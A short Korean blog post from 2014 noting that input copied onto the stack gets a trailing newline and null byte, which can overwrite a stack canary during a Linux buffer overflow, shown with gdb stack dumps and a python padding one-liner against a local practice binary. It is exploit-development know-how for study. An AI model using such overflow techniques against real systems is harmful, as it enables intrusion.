[Linux BOF] strcpy함수에 대한 것.

Tip 2014. 2. 27. 15:32

데이터를 특정한 곳에 갔다놓을때는 뒤에 널문자가 붙는듯.


따라서 ret 다음에 바로 canary가 존재할 경우에는 canary를 침범할 수 있으니 조심해야한다.


(gdb) x/100x $esp

0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1

0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161

0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a

0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000

0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300

0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161

0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161

0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161

(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res

(gdb) r < res

The program being debugged has been started already.

Start it from the beginning? (y or n) y

warning: cannot close "shared object read from target memory": File in wrong format

Starting program: /home/cruel/tmp/enigma < res

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x576000

(no debugging symbols found)

(no debugging symbols found)

enigma : The brothers will be glad to have you!

you : 

Breakpoint 3, 0x08048526 in vuln ()

(gdb) x/100x $esp

0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1

0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161

0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363

0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000

0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300

0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161

0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161

0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161



데이터 + \x0a\x00을 추가하는듯.

'Tip' 카테고리의 다른 글

[GDB] 스택 값 수정하기  (0) 2014.03.06
[Linux BOF] fgets 등 함수에서 쓰는 임시버퍼에 관해서  (0) 2014.03.02
[Linux BOF] 로컬에서 스택, 힙을 제외한 모든 영역 ASLR 풀수있는법  (0) 2014.02.24
[Linux BOF] strcpy같은 함수로 GOT Overwrite할 때  (0) 2014.02.22
[Linux BOF] pop;pop;ret 원리  (0) 2014.02.22
Posted by windowhan
,

티스토리툴바